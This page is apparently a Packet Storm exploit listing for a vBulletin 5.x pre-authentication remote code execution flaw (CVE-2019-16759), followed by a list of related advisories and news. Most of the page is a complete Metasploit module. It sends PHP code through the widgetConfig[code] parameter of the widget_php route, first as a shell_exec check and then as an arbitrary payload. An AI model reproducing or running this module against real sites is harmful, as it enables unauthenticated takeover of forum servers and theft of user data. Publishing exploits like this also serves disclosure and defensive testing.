Lucene search
R00tpgpPACKETSTORM:154648HistorySep 28, 2019 - 12:00 a.m.
vBulletin 5.x Pre-Auth Remote Code Execution
2019-09-2800:00:00
r00tpgp
packetstormsecurity.com
502
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',
'Description' => %q{
vBulletin 5.x 0day pre-auth RCE exploit.
This should work on all versions from 5.0.0 till 5.5.4
},
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Reported by: anonymous', # reported by
'Original exploit by: anonymous', # original exploit
'Metasploit mod by: r00tpgp', # metasploit module
],
'Payload' =>
{
'BadChars' => "\x22",
},
'References' =>
[
['CVE', 'CVE-2019-16759'],
['EDB', 'NA'],
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']
],
'Arch' => ARCH_PHP,
'Targets' => [
[ 'Automatic Targeting', { 'auto' => true } ],
# ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
# ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
],
'DisclosureDate' => 'Sep 23 2019',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
])
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
'encode_params' => false,
'vars_post' =>
{
'widgetConfig[code]' => "echo shell_exec(\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\');exit;",
}
})
if res && res.body && res.body.include?('h4x0000r4l1f4')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending payload.....")
resp = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
'encode_params' => false,
'vars_post' =>
{
#'widgetConfig[code]' => "echo " + payload.encoded + "exit;",
'widgetConfig[code]' => payload.encoded,
}
})
#unless resp and resp.code == 200
# fail_with(Failure::Unknown, "Exploit failed.")
#end
#print_good("Success!")
#print_line(resp.body)
end
end
`
Related
prion
prion
Cross site request forgery (csrf)
2019-09-24 22:15:00
Design/Logic Flaw
2020-08-12 14:15:00
Design/Logic Flaw
2020-10-30 17:15:00
thn
thn
Hackers Breach ZoneAlarm's Forum Site β Outdated vBulletin to Blame
2019-11-11 15:27:00
attackerkb
attackerkb
CVE-2019-16759
2019-09-24 00:00:00
CVE-2020-12720 vBulletin incorrect access control
2020-05-08 00:00:00
CVE-2020-17496
2020-08-12 00:00:00
nessus
nessus
vBulletin 'widget_php' Command Execution
2019-10-23 00:00:00
githubexploit
githubexploit
Exploit for Code Injection in Vbulletin
2020-08-24 16:15:10
Exploit for Code Injection in Vbulletin
2020-08-31 13:44:15
Exploit for Code Injection in Vbulletin
2020-02-20 23:14:52
threatpost
threatpost
vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach
2019-10-10 20:37:40
Rash of Exploits Targets Critical vBulletin RCE Bug
2019-09-26 17:45:03
Researcher Publishes Patch Bypass for vBulletin 0-Day
2020-08-11 12:09:30
canvas
canvas
Immunity Canvas: VBULLETIN_WIDGET_RCE
2019-09-24 22:15:00
packetstorm
packetstorm
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
vBulletin 5.x 0-Day Pre-Auth Remote Command Execution
2019-09-26 00:00:00
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
exploitdb
exploitdb
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
impervablog
impervablog
Attackers Are Quick to Exploit vBulletinβs Latest 0-day Remote Code Execution Vulnerability
2019-09-26 13:43:30
CrimeOps of the KashmirBlack Botnet β Part II
2020-10-22 18:55:05
zdt
zdt
vBulletin 5.5.4 Remote Command Execution Exploit #RCE
2019-12-11 00:00:00
vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution Exploit
2019-10-01 00:00:00
cve
cve
openvas
openvas
vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability
2019-09-25 00:00:00
vBulletin 5.x RCE Vulnerability
2020-08-10 00:00:00
exploitpack
exploitpack
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
cisa_kev
cisa_kev
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
metasploit
metasploit
checkpoint_advisories
checkpoint_advisories
vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)
2019-09-25 00:00:00
nuclei
nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
2021-02-24 20:00:52
vBulletin 5.0.0-5.5.4 - Remote Command Execution
2020-07-04 15:56:10
mssecure
mssecure
Ghost in the shell: Investigating web shell attacks
2020-02-04 17:30:40
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
Related for PACKETSTORM:154648